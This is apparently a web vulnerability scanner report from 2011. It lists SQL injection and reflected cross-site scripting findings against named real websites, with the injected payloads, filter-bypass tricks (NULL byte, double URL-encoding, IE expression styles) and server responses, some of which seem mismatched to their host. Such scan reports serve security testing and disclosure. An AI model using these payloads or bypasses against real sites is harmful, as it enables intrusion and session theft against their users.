1.1. http://www.danscomp.com/ [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.danscomp.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: PHP/5.2.3 Set-Cookie: token=46438%3A1301758136%3A17778; expires=Sat, 09-Apr-2011 15:28:56 GMT; domain=dunhillvacations.com X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 15:28:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="X-UA-Compatible" con ...[SNIP]... </a>]: message: Line 1: Incorrect syntax near '2011'. (severity 15) in C:\Inetpub\www.dunhillvacations.com\wwwroot\includes\v3\token.php on line 35 PHP Warning: mssql_query() [<a href='function.mssql-query'> ...[SNIP]... </a>]: message: Unclosed quotation mark before the character string ')'. (severity 15) in C:\Inetpub\www.dunhillvacations.com\wwwroot\includes\v3\token.php on line 35 PHP Warning: mssql_query() [<a href='function.mssql-query'> ...[SNIP]...
HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: PHP/5.2.3 Set-Cookie: token=78142%3A1301758137%3A54898; expires=Sat, 09-Apr-2011 15:28:57 GMT; domain=dunhillvacations.com X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 15:28:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="X-UA-Compatible" con ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 15:47:02 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny9 Connection: close Content-Type: text/html Content-Length: 33983
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> ...[SNIP]...
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 15:47:03 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny9 Connection: close Content-Type: text/html Content-Length: 33834
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <head> <TITLE>IC.cz - webhosting zdarma, freehosting, PHP4, PHP5, MySql, PostgreSql, str.nky zdarma, blog, fotogalerie</TITLE>
...[SNIP]...
1.4. http://www.ifly.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.ifly.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
<br /> <b>Fatal error</b>: Call to a member function execute() on a non-object in <b>/var/www/html/powertrip/classes/plug-ins/DatabaseWrapper.class.php</b> on line <b>118</b><br />
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
<meta property="fb:admins" content="636240531" ...[SNIP]... <a href="http://likem.info/like/view/28997" class="fmllink">Illegal immigration is not a new problem, Native Americans used to call it 'White People'.</a> ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... <a href="http://www.likethislist.org/likes.php?t=257">The best things in life are either illegal, bad, or fattening.</a> ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''google.com/search?hl=en&q='' LIMIT 1' at line 1 WITH SELECT * FROM @prefix@stat_referer_list WHERE re ...[SNIP]...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head><title>Email & PHP and MySql hosting. Free hosting and web mail.</title> <meta http-equiv="Content-Type" content= ...[SNIP]...
2. Cross-site scripting (reflected)previous There are 113 instances of this issue:
2.1. http://www.4jobs.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.4jobs.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 5a5bb><a>48525712c9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <style type="text/cs ...[SNIP]... zoneAlias=TR1_728x90_JS&r_sitepath=http://www.4jobs.com&r_partnerid=344072&r_partnersitename=4Jobs.com&t_pgid=213045580862436282&t_sn=/Default.asp&t_httph=www.4jobs.com&t_httpurl=/Default.asp&t_httpqs=5a5bb><a>48525712c9b=1&t_sgid=818312244230460616&t_ws=COLO-WEB06&t_ugid=590039464322416195&f_ip=173.193.214.243&ud=> ...[SNIP]...
2.2. http://www.4teachers.org/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.4teachers.org
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef252"><script>alert(1)</script>0c5510a2826 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <!--<meta http-equiv="Content-Type" content="text/html; charset=iso-88 ...[SNIP]... <a href="http://www.4teachers.org/?ef252"><script>alert(1)</script>0c5510a2826=1&lang=SP"> ...[SNIP]...
2.3. http://www.acne.org/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.acne.org
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6c680--><script>alert(1)</script>bec67766067 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.4. http://www.acne.org/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.acne.org
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8ef7'-alert(1)-'876c9abe3b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html>
<head> <title>Acne.org - Acne treatment and community</title> <meta http-equi ...[SNIP]... <script type="text/javascript"> $(document).ready(function() { // highlight the current menu root, with css .current-menu $.fn.reverse = [].reverse; $('#acne-menu a[href$=?c8ef7'-alert(1)-'876c9abe3b9=1]').parents('li').reverse().eq(0).addClass('current-menu') }); </script> ...[SNIP]...
2.5. http://www.actionext.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.actionext.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c1f2"><script>alert(1)</script>fc560b7b08b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>ActionEXT: how to ad ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6772046&c3=&c4=www.actionext.com/?9c1f2"><script>alert(1)</script>fc560b7b08b=1&c5=&c6=&c15=&cj=1" /> ...[SNIP]...
2.6. http://www.actionext.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.actionext.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23d24"-alert(1)-"4a4ebe7a9a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>ActionEXT: how to ad ...[SNIP]... <script type="text/javascript"> // Note: it's important to keep these in separate script blocks COMSCORE.beacon({ c1: 2, c2: "6772046", c3: "", c4: "www.actionext.com/?23d24"-alert(1)-"4a4ebe7a9a5=1", // Replace this with the page URL that the site is on here, and also enter it into the <noscript> ...[SNIP]...
2.7. http://www.adoption.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.adoption.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc391"><script>alert(1)</script>a33a5854b79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Adoption, International, Domes ...[SNIP]... <input type="hidden" name="page" value="http://www.adoption.com/?bc391"><script>alert(1)</script>a33a5854b79=1" /> ...[SNIP]...
2.8. http://www.adpost.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.adpost.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22c37"><script>alert(1)</script>1bc67eff4a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.0 200 OK Date: Sat, 02 Apr 2011 15:50:56 GMT Server: Apache Content-Type: text/html; charset=ISO-8859-1 Vary: Accept-Encoding Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <TITLE>Free Classifieds @ Adpost.com</TITLE> <!Se ...[SNIP]... <a href="javascript:window.external.AddFavorite('http://www.adpost.com/us/?22c37"><script>alert(1)</script>1bc67eff4a3=1', 'Adpost.com Classifieds - Free Classifieds ')"> ...[SNIP]...
2.9. http://www.allsubs.org/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.allsubs.org
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b9fa"><script>alert(1)</script>02acd87532c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir=> <head> <title>Subtitles - Di ...[SNIP]... <a href="mailto:?subject=Check out this subtitles site&body=Check out this link : http://www.allsubs.org/?1b9fa"><script>alert(1)</script>02acd87532c=1"> ...[SNIP]...
2.10. http://www.arcamax.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.arcamax.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4cb6"><script>alert(1)</script>696fff07a83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.11. http://www.betus.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.betus.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7b38"-alert(1)-"6a2e71f8eef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Sports Betting ...[SNIP]... <![CDATA[ /* You may give each page an identifying name, server, and channel on the next lines. */ s.pageName="www.betus.com/default.aspx?d7b38"-alert(1)-"6a2e71f8eef=1" s.server="VM1-CERES02" s.channel="Welcome" s.pageType="" s.prop1="" s.prop2=""
2.12. http://www.biblestudytools.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.biblestudytools.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload beeb5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebcc61a5957b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as beeb5"><script>alert(1)</script>bcc61a5957b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
2.13. http://www.blockbusterexpress.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.blockbusterexpress.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c35fa'-alert(1)-'6b6fbf09de4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.14. http://www.boardofwisdom.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.boardofwisdom.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7be11"><script>alert(1)</script>df9138e0d1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.15. http://www.brainpop.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.brainpop.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5aca9"><script>alert(1)</script>955b95f7adb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html > <head> <META HTTP-EQUIV="Content-Type" content="text/html; charset=UTF-8"> <META name= ...[SNIP]... <input type="hidden" id="refer" name="refer" value="/?5aca9"><script>alert(1)</script>955b95f7adb=1" /> ...[SNIP]...
2.16. http://www.chakpak.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.chakpak.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 643b6"style%3d"x%3aexpression(alert(1))"fe964d8e6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 643b6"style="x:expression(alert(1))"fe964d8e6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script> <script type='t ...[SNIP]... <a href="/find/movies/?643b6"style="x:expression(alert(1))"fe964d8e6a=1"> ...[SNIP]...
2.17. http://www.chakpak.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.chakpak.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f008'%3b3986bdcbcd1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3f008';3986bdcbcd1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script> <script type='t ...[SNIP]... dEmail() { alertme182531890_submitAlert(); var val=document.getElementById('alertme182531890_email_id').value; logServerFromClient('182531890|-1 eId: -1 eType: alert:SEARCH kw:?3f008';3986bdcbcd1=| email sent '+val);
}
function alertme182531890_isGoodEmail() { var val=document.getElementById('alertme182531890_email_id').value; if (val.match('@') && (val.match ...[SNIP]...
2.18. http://www.couponconnector.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.couponconnector.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e603f"><script>alert(1)</script>7d4e29b47fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <input type="hidden" name="page" value="/?e603f"><script>alert(1)</script>7d4e29b47fd=1"> ...[SNIP]...
2.19. http://www.curezone.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.curezone.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dfe7"><script>alert(1)</script>59cde8d3ac6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.20. http://www.curezone.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.curezone.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 94e09<script>alert(1)</script>45687e24cc0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.21. http://www.dafont.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dafont.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8016"><script>alert(1)</script>5e7327fdc12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>dafont.com</title><meta name="description" content="Archive of freely downloadab ...[SNIP]... <a href="/fr/?b8016"><script>alert(1)</script>5e7327fdc12=1"> ...[SNIP]...
2.22. http://www.dafont.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dafont.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 31e15><script>alert(1)</script>168c4a55ca4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>dafont.com</title><meta name="description" content="Archive of freely downloadab ...[SNIP]... <div style="margin-left:140px;display:block;cursor:pointer;height:54px;background:#e6e6e6" OnClick=document.location.href="/?31e15><script>alert(1)</script>168c4a55ca4=1#top" class="tdn"> ...[SNIP]...
2.23. http://www.dailystrength.org/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailystrength.org
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21d7b"-alert(1)-"e44377d2817 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.24. http://www.ebgames.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ebgames.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17243'><script>alert(1)</script>45828464d03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><meta http-equiv="Con ...[SNIP]... <a href='/Profiles/Login.aspx?ReturnUrl=/?17243'><script>alert(1)</script>45828464d03=1' id='header_auth_actions' rel='nofollow'> ...[SNIP]...
2.25. http://www.farmersalmanac.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.farmersalmanac.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eadf"><script>alert(1)</script>960828df2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2eadf\"><script>alert(1)</script>960828df2e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/ ...[SNIP]... <input type="hidden" name="redirect_to" value="/?2eadf\"><script>alert(1)</script>960828df2e=1" /> ...[SNIP]...
2.26. http://www.finecooking.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.finecooking.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8d0dd-->f45e9519164 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
2.27. http://www.fxnetworks.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fxnetworks.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4e73"><script>alert(1)</script>b20e69dece1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.28. http://www.fxnetworks.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fxnetworks.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35f81"-alert(1)-"6420fe2faa5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.29. http://www.hotboysatplay.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.hotboysatplay.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c750b"><script>alert(1)</script>54a9d6e31a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="http://www.hotboysatplay.com/categ.php?categ=HotBoysAtPlay_free&c750b"><script>alert(1)</script>54a9d6e31a2=1" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image33','','img/main_samples_up.gif',1)"> ...[SNIP]...
2.30. http://www.importantscore.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.importantscore.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59ac6"><script>alert(1)</script>5e961b20767 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org ...[SNIP]... <input type="hidden" name="return" value="/?59ac6"><script>alert(1)</script>5e961b20767=1"> ...[SNIP]...
2.31. http://www.jobcentral.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
